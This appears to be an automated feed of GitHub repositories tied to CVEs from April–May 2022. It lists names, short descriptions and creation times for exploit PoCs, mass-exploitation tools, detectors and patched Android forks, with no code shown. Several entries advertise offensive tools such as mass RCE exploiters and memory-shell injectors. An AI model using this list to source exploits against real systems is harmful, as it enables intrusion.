Cachet configuration leak dumper. CVE-2021-39174 PoC. : narkopolo/CVE-2021-39174-PoC create time: 2022-05-03T20:17:23Z

My own python implementation of a CVE-2021-22204 exploit : BBurgarella/CVE-2021-22204 create time: 2022-05-03T16:36:02Z

no description : rhysmcneill/CVE-2021-403 create time: 2022-05-03T09:36:40Z

no description : Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215 create time: 2022-05-03T05:47:48Z

CVE-2018-17553 PoC : MidwintersTomb/CVE-2018-17553 create time: 2022-05-03T02:43:59Z

PoC of CVE-2022-24707 : Altelus1/CVE-2022-24707 create time: 2022-05-03T01:11:56Z

DISCLAIMER: This is a re-upload of my very first spring project from 2019. It contains old dependencies with known CVEs, a lot of bad practices and many poor design decisions. It should not be taken as any kind of reference. It is only here to remind me where I started :) : mockxe/cardatabase create time: 2022-04-25T16:22:14Z

no description : Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228 create time: 2022-05-02T16:53:26Z

no description : Off3nS3c/CVE-2022-29932 create time: 2022-05-02T13:56:05Z

TOTOLINK A800R/A810R/A830R/A950RG/A3000RU/A3100R setUpgradeFW FileName command injection : ExploitPwner/Totolink-CVE-2022-Exploits create time: 2022-05-02T06:47:00Z

CVE-2022-22954, CVE-2022-22955,CVE-2022-22956, CVE-2022-22957, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2022-22961 all in one! : kaanymz/2022-04-06-critical-vmware-fix create time: 2022-05-01T20:52:10Z

no description : yuanLink/CVE-2022-26809 create time: 2022-05-01T13:19:10Z

Resolving the CVE-2022-22948 vulnerability : kaanymz/vcenter-cve-fix create time: 2022-05-01T11:28:07Z

TEM FLEX-1080/FLEX-1085 1.6.0 log log.cgi Information Disclosure : MrEmpy/CVE-2022-1077 create time: 2022-04-30T21:55:03Z

This repository contains a PoC for remote code execution CVE-2022-26809 : ZyxelTeam/CVE-2022-26809-RCE create time: 2022-04-30T15:49:28Z

no description : kuangting4231/mitigation-cve-2019-9787 create time: 2022-04-30T12:19:50Z

no description : Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381 create time: 2022-04-30T06:37:25Z

no description : Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418 create time: 2022-04-30T06:16:17Z

no description : Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511 create time: 2022-04-30T05:54:11Z

no description : UUFR/CVE-2022-29464 create time: 2022-04-30T04:30:51Z

no description : UUFR/CVE-2022-29464 create time: 2022-04-30T04:21:26Z

no description : Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924 create time: 2022-04-30T03:40:15Z

CVE-2021-44228 Log4j Summary : TPower2112/Writing-Sample-1 create time: 2022-04-30T02:35:38Z

CVE-2022-28508 : YavuzSahbaz/CVE-2022-28508 create time: 2022-04-28T01:10:17Z

SQL injection for Poultry Farm Management System 1.0 : IbrahimEkimIsik/CVE-2022-28099 create time: 2022-04-30T02:01:09Z

This is an edited version of the CVE-2018-19422 exploit to fix an small but annoying issue I had. : Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth- create time: 2022-04-29T17:23:23Z

no description : Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963 create time: 2022-04-29T12:36:35Z

no description : ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326 create time: 2022-04-29T11:05:51Z

no description : ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240 create time: 2022-04-29T10:25:19Z

no description : Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841 create time: 2022-04-29T10:16:14Z

no description : Enokiy/spring-RCE-CVE-2022-22965 create time: 2022-04-29T09:58:05Z

CVE-2022-29464 POC exploit : superzerosec/CVE-2022-29464 create time: 2022-04-29T08:24:17Z

no description : Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155 create time: 2022-04-29T06:33:54Z

no description : Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393 create time: 2022-04-29T07:09:27Z

no description : Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313 create time: 2022-04-29T06:30:27Z

no description : Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198 create time: 2022-04-29T06:08:29Z

no description : Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181 create time: 2022-04-29T05:24:12Z

no description : Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396 create time: 2022-04-29T05:28:48Z

no description : Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516 create time: 2022-04-29T04:30:40Z

no description : iczc/Ethermint-CVE-2021-25837 create time: 2022-04-29T03:12:27Z

CVE-2022-28452 : YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL create time: 2022-04-29T03:03:25Z

Loops through all Log4j files and remediates CVE-2021-44228 : digital-dev/Log4j-CVE-2021-44228-Remediation create time: 2022-04-28T23:56:01Z

no description : mwina/CVE-2022-21728-test create time: 2022-04-28T23:56:58Z

CVE-2021-30937 vulnerability checking app : realrodri/ExploiteameEsta create time: 2022-04-28T14:50:00Z

no description : Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453 create time: 2022-04-28T13:12:23Z

Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection - CVE-2021-24507 : RandomRobbieBF/CVE-2021-24507 create time: 2022-04-28T13:10:55Z

Solar Appscreener XXE : jet-pentest/CVE-2022-24449 create time: 2022-04-28T12:51:01Z

no description : Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706 create time: 2022-04-28T11:30:43Z

no description : ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452 create time: 2022-04-28T10:23:41Z

no description : Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034 create time: 2022-04-28T10:04:41Z

no description : ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329 create time: 2022-04-28T08:41:00Z

no description : ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328 create time: 2022-04-28T08:28:31Z

no description : Satheesh575555/linux-4.19.72_CVE-2021-45485 create time: 2022-04-28T07:38:04Z

no description : Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990 create time: 2022-04-28T05:39:11Z

for kernel 3.18.x : enceka/cve-2019-2215-3.18 create time: 2022-04-28T03:47:00Z

no description : RedLeavesChilde/CVE-2021-40444 create time: 2022-04-28T02:14:10Z

CVE-2022-28454 : YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS- create time: 2022-04-28T01:12:19Z

no description : QwertyStack/CVE-2021-40444_PoC create time: 2022-04-27T20:38:22Z

CVE-2021-41773&CVE-2021-42013 : wangfly-me/Apache_Penetration_Tool create time: 2022-04-27T15:17:38Z

no description : Nivaskumark/A10_system_bt_CVE-2021-0589 create time: 2022-04-27T12:08:18Z

no description : Nivaskumark/expat_A10_r33_2_2_6_CVE-2022-23990 create time: 2022-04-27T11:46:00Z

OS X 10.11.6 LPE PoC for CVE-2016-4655 / CVE-2016-4656 : liangle1986126z/jndok create time: 2022-04-27T09:11:28Z

no description : khidottrivi/CVE-2022-22965 create time: 2022-04-27T07:57:50Z

no description : pazhanivel07/Settings_10-r33_CVE-2020-0394_02 create time: 2022-04-27T04:59:22Z

no description : pazhanivel07/Settings_10-r33_CVE-2020-0394 create time: 2022-04-27T04:42:49Z

no description : nanopathi/frameworks_base1_CVE-2021-0315 create time: 2022-04-27T05:01:30Z

no description : nanopathi/packages_apps_Settings_CVE-2021-0394 create time: 2022-04-27T04:40:51Z

Image Magick Exploit for CVE-2016–3714 : MrrRaph/pandagik create time: 2022-04-26T17:12:36Z

no description : nanopathi/Packages_wpa_supplicant8_CVE-2021-0326 create time: 2022-04-26T14:41:51Z

no description : Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326 create time: 2022-04-26T14:33:04Z

CVE-2021-4034 PoC : 0x4ndy/CVE-2021-4034-PoC create time: 2022-04-20T19:44:03Z

Django QuerySet.annotate(), aggregate(), extra() SQL 注入 : DeEpinGh0st/CVE-2022-28346 create time: 2022-04-26T14:47:56Z

no description : nanopathi/wpa_supplicant_8_CVE-2021-0326. create time: 2022-04-26T14:19:31Z

no description : nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692 create time: 2022-04-26T13:03:35Z

no description : pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315 create time: 2022-04-26T12:46:33Z

no description : nanopathi/linux-4.19.72_CVE-2021-3347 create time: 2022-04-26T11:32:34Z

dingdingtest : w1023913214/CVE-2022-8899 create time: 2022-04-26T11:26:18Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-39704 create time: 2022-04-26T11:04:14Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0315 create time: 2022-04-26T10:38:35Z

PoC for Dirty COW (CVE-2016-5195) : passionchenjianyegmail8/scumjrs create time: 2022-04-26T08:54:16Z

no description : w1023913214/CVE-2022-15213 create time: 2022-04-26T08:34:37Z

no description : lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle create time: 2022-04-26T07:52:24Z

test dingding : w1023913214/CVE-2022-3333 create time: 2022-04-26T08:05:12Z

CVE-2022-22947 注入Godzilla内存马 : whwlsfb/cve-2022-22947-godzilla-memshell create time: 2022-04-26T05:48:27Z

no description : lowkey0808/cve-2022-29464 create time: 2022-04-26T05:28:39Z

CVE-2021-20038 multithreaded Mass Scanner and Exploiter tool. SonicWall SMA-100 Unauth RCE Exploit : XmasSnowREAL/CVE-2021-20038-Mass-RCE create time: 2022-04-26T04:38:11Z

Make it possible to build a vulnerable webmin virtual environment as a container using docker : dnr6419/CVE-2021-32157 create time: 2022-04-26T01:49:11Z

CVE-2021-43857(gerapy命令执行) : lowkey0808/CVE-2021-43857 create time: 2022-04-26T01:38:06Z

JetBrains YouTrack before 2020.2.8873 is vulnerable to SSRF in the Workflow component. : XmasSnowREAL/CVE-2020-15823 create time: 2022-04-25T19:16:00Z

A Zeek package to detect CVE-2021-42292, a Microsoft Excel local privilege escalation exploit. : XmasSnowREAL/CVE-2021-42292 create time: 2022-04-25T18:48:42Z

CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime : XmasSnowREAL/CVE-2022-26809-RCE create time: 2022-04-25T18:40:24Z

Test tool to demonstrate the vulnerability of CVE-2022-21449 : Damok82/SignChecker create time: 2022-04-25T16:02:24Z

The RRS v500 application is vulnerable to a Local File Inclusion (LFI) vulnerability. : TheGetch/CVE-2022-29597 create time: 2022-04-21T20:22:38Z

The RRS v500 application is vulnerable to a reflected Cross-Site Scripting (XSS) vulnerability. : TheGetch/CVE-2022-29598 create time: 2022-04-21T20:14:29Z

SXF VPN RCE : shirouQwQ/CVE-2022-2333 create time: 2022-04-25T10:13:40Z

no description : anldori/Drupal-CVE-2018-7600 create time: 2022-04-25T08:46:00Z

no description : nanopathi/packages_apps_Settings_CVE-2021-0586 create time: 2022-04-25T07:58:29Z

SQL injection in QuerySet.annotate(), aggregate(), and extra() : YouGina/CVE-2022-28346 create time: 2022-04-25T08:27:34Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0339 create time: 2022-04-25T07:09:36Z

cve-2021-32849(gerapy命令执行) : lowkey0808/cve-2021-32849 create time: 2022-04-25T06:44:46Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2020-0227 create time: 2022-04-25T06:18:58Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0954 create time: 2022-04-25T05:13:39Z

A basic analysis about CVE-2021-35942. SQL injection in Django. : WynSon/CVE-2021-35042 create time: 2022-04-25T02:50:00Z

no description : k4u5h41/CVE-2022-29464 create time: 2022-04-24T22:40:38Z

😭 WSOB is a python created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464. : oppsec/WSOB create time: 2022-04-24T18:25:26Z

My research about CVE-2021-4034 : antoinenguyen-09/CVE-2021-4034 create time: 2022-04-24T14:52:55Z

POC Code for gaining foothold on a server vulnerable to CVE_2019_15107 : merlin-ke/CVE_2019_15107 create time: 2019-09-24T19:02:19Z

Zeek script to detect exploitation attempts of CVE-2022-21449 for TLS connections : thack1/CVE-2022-21449 create time: 2022-04-24T10:59:11Z

no description : LogSec/CVE-2013-2006 create time: 2022-04-24T07:42:14Z

no description : LogSec/CVE-2013-0212 create time: 2022-04-24T06:13:43Z

Proof of concept exploit for CVE-2021-42697: Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments. : cxosmo/CVE-2021-42697 create time: 2022-04-24T05:51:24Z

Proof of concept exploit for CVE-2022-29548: A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. : cxosmo/CVE-2022-29548 create time: 2022-04-24T06:00:25Z

CVE-2021-20038 multithreaded Mass Scanner and Exploiter tool. SonicWall SMA-100 Unauth RCE Exploit : ExploitPwner/CVE-2021-20038-Mass-RCE create time: 2022-04-24T02:02:54Z

no description : B0nfee/CVE-2022-21882 create time: 2022-04-23T17:49:59Z

no description : B0nfee/CVE-2022-25636 create time: 2022-04-23T17:49:30Z

no description : B0nfee/CVE-2022-0995 create time: 2022-04-23T17:48:40Z

no description : roger109/CVE-2022-26809-RCE-POC create time: 2022-04-23T16:05:36Z

CVE-2022-26809-RCE : oppongjohn/CVE-2022-26809-RCE create time: 2022-04-23T16:01:44Z

no description : nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318 create time: 2022-04-23T12:43:31Z

no description : LogSec/CVE-2010-2387 create time: 2022-04-23T12:24:23Z

no description : rafaelchriss/CVE-2021-3279 create time: 2022-04-23T12:30:21Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317 create time: 2022-04-23T10:05:37Z

no description : mariomamo/CVE-2022-22965 create time: 2022-04-23T09:01:22Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2020-0401 create time: 2022-04-23T08:17:35Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2020-0137 create time: 2022-04-23T07:02:41Z

no description : ShaikUsaf/linux-4.19.72_CVE-2020-14356 create time: 2022-04-23T06:45:44Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0513 create time: 2022-04-23T05:50:23Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705 create time: 2022-04-23T04:47:32Z

no description : ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337 create time: 2022-04-23T04:41:42Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0327 create time: 2022-04-23T03:01:52Z

Repository containing nse script for vulnerability CVE-2022-29464 known as WSO2 RCE. : gpiechnik2/nmap-CVE-2022-29464 create time: 2022-04-22T21:23:57Z

no description : 0xAgun/CVE-2022-29464 create time: 2022-04-22T22:13:45Z

A python script/generator, for generating and exploiting Microsoft vulnerability : BRAINIAC22/CVE-2017-0199 create time: 2022-04-22T19:10:16Z

no description : ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188 create time: 2022-04-22T10:24:13Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708 create time: 2022-04-22T09:39:02Z

no description : jones199023/CVE-2022-26809 create time: 2022-04-22T10:21:30Z

no description : ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481 create time: 2022-04-22T09:10:38Z

no description : martinfrancois/CVE-2021-36460 create time: 2022-04-22T08:33:47Z

CVE-2022-25943 : webraybtl/CVE-2022-25943 create time: 2022-04-22T08:30:55Z

no description : Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166 create time: 2022-04-22T07:43:37Z

no description : CberryAIRDROP/CVE-2022-26809-RCE create time: 2021-09-01T09:48:31Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203 create time: 2022-04-22T06:59:37Z

no description : pazhanivel07/frameworks_av-CVE-2020-0218 create time: 2022-04-22T06:32:40Z

no description : Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336 create time: 2022-04-22T06:36:57Z

no description : nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340 create time: 2022-04-22T06:24:14Z

no description : pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595 create time: 2022-04-22T06:09:00Z

no description : nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183 create time: 2022-04-22T05:28:45Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2021-0522 create time: 2022-04-22T04:59:56Z

no description : gudyrmik/CVE-2021-44142 create time: 2022-04-22T04:46:54Z

WSO2 RCE (CVE-2022-29464) : h3v0x/CVE-2022-29464 create time: 2022-04-22T05:19:51Z

cve-2022-29464 批量脚本 : Lidong-io/cve-2022-29464 create time: 2022-04-22T02:01:39Z

A Zeek detector for CVE-2022-24497. : corelight/CVE-2022-24497 create time: 2022-04-13T17:12:59Z

no description : nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519 create time: 2022-04-21T18:47:00Z

Demos the Psychic Signatures vulnerability (CVE-2022-21449) : marschall/psychic-signatures create time: 2022-04-21T16:26:50Z

Pre-auth RCE bug CVE-2022-29464 : mr-r3bot/WSO2-CVE-2022-29464 create time: 2022-04-21T14:47:18Z

no description : nanopathi/system_core_AOSP10_r33_CVE-2020-0409 create time: 2022-04-21T11:30:46Z

no description : Trinadh465/frameworks_base_AOSP_r33_CVE_2021-0334 create time: 2022-04-21T12:22:55Z

no description : nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437 create time: 2022-04-21T10:37:06Z

no description : nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160 create time: 2022-04-21T09:36:45Z

just demo an exploit : killvxk/CVE-2021-3972 create time: 2022-04-21T10:25:32Z

no description : c4mx/CVE-2022-22965_PoC create time: 2022-04-21T10:17:42Z

CVE-2016-10924 - Directory traversal vulnerability in WordPress ebook-download plugin(<1.2). PoC + PID Bruteforce in Python. : rvizx/CVE-2016-10924 create time: 2022-04-21T09:21:56Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640 create time: 2022-04-21T08:53:08Z

no description : c4mx/CVE-2022-22965_PoC create time: 2022-04-21T08:37:48Z

no description : nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508 create time: 2022-04-21T08:15:00Z

no description : pazhanivel07/system_bt_A10_r33_CVE-2021-0474 create time: 2022-04-21T07:22:59Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2021-0431 create time: 2022-04-21T07:20:59Z

no description : achuna33/CVE-2022-0265 create time: 2022-04-21T08:24:26Z

no description : c4mx/CVE-2022-22965_PoC create time: 2022-04-21T08:20:37Z

no description : ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431 create time: 2022-04-21T07:05:53Z

no description : ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435 create time: 2022-04-21T06:54:34Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2021-0435 create time: 2022-04-21T06:37:09Z

no description : tufanturhan/wso2-rce-cve-2022-29464 create time: 2022-04-21T06:48:35Z

no description : nanopathi/system_media_AOSP10_r33_CVE-2020-0458 create time: 2022-04-21T06:20:46Z

no description : Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509 create time: 2022-04-21T06:23:26Z

no description : nanopathi/system_media_AOSP10_r33_CVE-2020-0458 create time: 2022-04-21T05:28:58Z

no description : 0xUhaw/CVE-2022-0778 create time: 2022-04-21T04:04:27Z

WSO2 RCE (CVE-2022-29464) exploit. : hakivvi/CVE-2022-29464 create time: 2022-04-20T21:23:52Z

This repository contains a PoC for remote code execution CVE-2022-26809 : DESC0N0C1D0/CVE-2022-26809-RCE create time: 2022-04-20T20:54:26Z

CVE-2022-21449 Proof of Concept demonstrating its usage with a vulnerable client and a malicious TLS server : khalednassar/CVE-2022-21449-TLS-PoC create time: 2022-04-20T20:31:15Z

CVE-2018-14714 PoC RCE : sunn1day/CVE-2018-14714-POC create time: 2022-04-20T20:12:36Z

CVE-2020-36109 PoC causing DoS : sunn1day/CVE-2020-36109-POC create time: 2022-04-20T20:07:51Z

Tool which leverages CVE-2021-36798 (HotCobalt) and related work from SentinelOne to DoS CobaltStrike 4.2 and 4.3 servers : hariomenkel/CobaltSploit create time: 2022-04-20T16:36:23Z

no description : yavolo/CVE-2018-6574 create time: 2022-04-20T16:03:00Z

no description : pazhanivel07/system_bt_A10-r33_CVE-2020-0176 create time: 2022-04-20T13:17:24Z

no description : pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510 create time: 2022-04-20T12:29:25Z

no description : 0xBrAinsTorM/CVE-2021-36981 create time: 2022-04-20T12:26:24Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433 create time: 2022-04-20T12:03:35Z

CVE-2022-21449 Vulnerability tester : jmiettinen/CVE-2022-21449-vuln-test create time: 2022-04-20T11:47:55Z

no description : jfrog/jfrog-CVE-2022-21449 create time: 2022-04-20T10:23:07Z

no description : Phantomlancer123/CVE-2017-0199 create time: 2022-04-20T09:07:52Z

CVE-2017-9841批量扫描及利用脚本。PHPUnit是其中的一个基于PHP的测试框架。 PHPUnit 4.8.28之前的版本和5.6.3之前的5.x版本中的Util/PHP/eval-stdin.php文件存在安全漏洞。远程攻击者可通过发送以‘<?php’字符串开头的HTTP POST数据利用该漏洞执行任意PHP代码。 : jax7sec/CVE-2017-9841 create time: 2022-04-20T07:01:20Z

no description : ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475 create time: 2022-04-20T06:36:43Z

no description : ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380 create time: 2022-04-20T06:19:13Z

no description : Grazee/CVE-2022-1329-WordPress-Elementor-RCE create time: 2022-04-20T01:06:01Z

no description : khalednassar/CVE-2020-27301-hostapd create time: 2022-04-19T17:07:23Z

no description : ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416 create time: 2022-04-19T18:12:43Z

no description : ixSly/CVE-2021-43515 create time: 2022-04-19T16:35:57Z

no description : XHSecurity/CVE-2022-26809 create time: 2022-04-19T14:26:33Z

ms15-034 or CVE-2015-1635 批量扫描 : SkinAir/ms15-034-Scan create time: 2022-04-19T13:32:56Z

no description : Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340 create time: 2022-04-19T13:15:49Z

no description : Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589 create time: 2022-04-19T11:37:01Z

no description : ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394 create time: 2022-04-19T11:06:28Z

no description : pazhanivel07/openjpeg-2.3.0_CVE-2020-27824 create time: 2022-04-19T10:53:52Z

no description : Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401 create time: 2022-04-19T10:24:11Z

cve-2022-26809 Remote Code Execution Exploit in the RPC Library : XmasSnow1/cve-2022-26809 create time: 2022-04-19T10:01:54Z

CVE-2022-26809 exploit : BugHunter010/CVE-2022-26809 create time: 2022-04-19T09:28:28Z

CVE-2021-4034 : karaname/pkexec-exploit create time: 2022-04-19T08:46:43Z

no description : Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332 create time: 2022-04-19T06:06:57Z

XmasSnow-is-scammer : XmasSnow-is-scammer/CVE-2022-26809 create time: 2022-04-19T06:14:28Z

A pkexec CVE-2021-4034 vulnerability exploit : rhin0cer0s/CVE-2021-4034 create time: 2022-04-19T05:01:19Z

A web application vulnerable to CVE-2020-14343 insecure deserialization leading to command execution in PyYAML package. : j4k0m/loader-CVE-2020-14343 create time: 2022-04-19T02:06:41Z

no description : hemazoher/CVE-2022-26809-RCE create time: 2022-04-18T22:30:32Z

vuln scaner and exploit : HellKnightsCrew/CVE-2022-26809 create time: 2022-04-18T19:26:59Z

7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. : sentinelblue/CVE-2022-29072 create time: 2022-04-18T18:59:01Z

no description : puneetbehl/grails3-cve-2022-27772 create time: 2022-04-18T17:32:49Z

Powershell to mitigate CVE-2022-29072 : tiktb8/CVE-2022-29072 create time: 2022-04-18T17:08:43Z

no description : ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226 create time: 2022-04-18T15:24:51Z

Watchguard RCE POC CVE-2022-26318 : h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318 create time: 2022-04-18T15:14:30Z

CVE-2019-15107 : f0rkr/CVE-2019-15107 create time: 2022-04-18T11:25:42Z

no description : Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219 create time: 2022-04-18T11:45:18Z

no description : Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478 create time: 2022-04-18T11:16:45Z

no description : Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319 create time: 2022-04-18T09:31:22Z

CVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists. : ExploitPwner/CVE-2021-44228-Mass-RCE-Log4j create time: 2022-04-18T09:16:05Z

no description : jkakavas/CVE-2022-0778-POC create time: 2022-04-18T07:51:18Z

no description : ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705 create time: 2022-04-18T06:51:16Z

no description : Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594 create time: 2022-04-18T06:06:42Z

no description : 3SsFuck/CVE-2021-31805-POC create time: 2022-04-18T05:28:52Z

no description : w1023913214/CVE-2022-18852 create time: 2022-04-18T06:08:08Z

GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) cve-2021-22205 : momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated- create time: 2022-04-18T04:56:18Z

A proof of concept of the CVE-2022-26809-RCE vulnerability. : F1uk369/CVE-2022-26809 create time: 2022-04-18T03:45:45Z

first golang implementation ever : qasj/CVE-2021-4034 create time: 2022-04-18T01:20:16Z

CVE-2015-1635-POC,指定IP与端口验证HTTP.sys漏洞是否存在 : w01ke/CVE-2015-1635-POC create time: 2022-04-17T16:48:44Z

PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. : dengyang123x/0vercl0k create time: 2022-04-17T17:00:49Z

A Log4j vulnerability scanner is used to identify the CVE-2021-44228 and CVE_2021_45046 : manishkanyal/log4j-scanner create time: 2022-04-17T11:01:24Z

List of CVE-2021-* : mcdulltii/CVE-2021 create time: 2022-04-17T05:56:34Z

WordPress Elementor 3.6.0 3.6.1 3.6.2 RCE POC : mcdulltii/CVE-2022-1329 create time: 2022-04-17T05:44:45Z

Scripted Linux Privilege Escalation for the CVE-2022-0847 "Dirty Pipe" vulnerability : rexpository/Linux-privilege-escalation create time: 2022-04-17T04:28:24Z

Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated) : TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated create time: 2021-12-01T20:12:56Z

Exploit for CVE-2021-22204. : UNICORDev/exploit-CVE-2021-22204 create time: 2022-04-16T22:49:47Z

Repository containing nse script for vulnerability CVE-2022-21907. It is a component (IIS) vulnerability on Windows. It allows remote code execution. The vulnerability affects the kernel module http. sys, which handles most basic IIS operations. : gpiechnik2/nmap-CVE-2022-21907 create time: 2022-04-16T19:13:27Z

Metabase NTLM Attack : secure-77/CVE-2022-24853 create time: 2022-04-16T19:41:15Z

Laravel RCE (CVE-2021-3129) : joshuavanderpoll/CVE-2021-3129 create time: 2022-04-16T17:22:55Z

PoC for CVE-2021-39749, allowing starting arbitrary Activity on Android 12L Beta : michalbednarski/OrganizerTransaction create time: 2022-04-16T16:36:48Z

CVE 2022-22954 - VMWare Workspace ONE Acess SSTI : astraztech/vmware4shell create time: 2022-04-16T15:54:43Z

CVE-2021-44529 Ivanti EPM 云服务设备 (CSA) 中的代码注入漏洞允许未经身份验证的用户以有限的权限(nobody)执行任意代码。 : jax7sec/CVE-2021-44529 create time: 2022-04-16T15:19:39Z

no description : XmasSnow/CVE-2022-26809-RCE create time: 2022-04-16T14:09:59Z

no description : AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit create time: 2022-04-15T19:37:35Z

PoC for CVE-2021-31805 (Apache Struts2) : aeyesec/CVE-2021-31805 create time: 2022-04-15T16:09:52Z

vulnerability in version 20.21.7 of D2L Learning Management System (LMS) : Skotizo/CVE-2021-43129 create time: 2022-04-12T21:04:44Z

7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. : kagancapar/CVE-2022-29072 create time: 2022-04-15T22:59:03Z

CVE-2022-0185 solution : E1efuntik/CVE-2022-0185 create time: 2022-04-15T20:56:54Z

CVE-2022-22954 VMware Workspace ONE Access free marker SSTI : MLX15/CVE-2022-22954 create time: 2022-04-15T19:26:56Z

